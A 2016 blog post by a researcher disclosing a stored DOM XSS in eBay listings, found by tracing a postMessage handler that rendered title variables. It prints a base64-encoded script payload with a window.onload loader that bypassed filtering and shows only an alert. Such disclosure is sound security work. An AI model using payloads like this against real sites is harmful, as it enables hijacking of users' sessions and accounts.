Wednesday, February 17, 2016

Persistent (Stored) DOM XSS on ebay.com domain


Persistent DOM XSS on ebay.com domain.



In details... :)



One of my hobbies, is selling on ebay.
In January 2015, i've analyzed creation of selling page, and how it's handled by ebay.com.

If we look at random listing, we'll notice, that user's content loaded from ebaydesc.com, so if you try to execute some javascript on your custom listing, you will get alert from http://vi.vipr.ebaydesc.com.



It's ok, it's "secure".

But, if we'll go deeper, we will notice that our page load one strange external javascript at the bottom of user's content page:



By analyzing that script, i've notices that there presents postMessage function:




and... if there is postMessage, so somewhere should be some kind of receiveMessage().
There are a lot of postMessages, and i've decided to search by domain name.

Let's search for vi.vipr.ebaydesc.com in all resources:







then it's key 'tgto' as origin:



Bingo! There are two variables that are rendered to the client!
1. _odtTitle
2. _odtSubTitle

Now i need to write a working XSS for it with some evasions, because of simple filtration...

Base payload:
_odtTitle='\<script\>alert(\'xss by alexander korznikov\\n\\n\'\+document.domain);\<\/script\>';

Encoded with base64 and appended to listing description in <script> tag:
<script>

code = atob("X29kdFRpdGxlPSdcPHNjcmlwdFw+YWxlcnQoXCd4c3MgYnkgYWxleGFuZGVyIGtvcnpuaWtvdlxcblxcblwnXCtkb2N1bWVudC5kb21haW4pO1w8XC9zY3JpcHRcPic7")

window.onload = function() {
   var s = document.createElement('script');
   s.type = 'text/javascript';
   s.text = code;
   document.body.appendChild(s);
   }
</script>


Thank you eBay for this cool challenge! :)

P.S. But why did you managed to fix it for one year?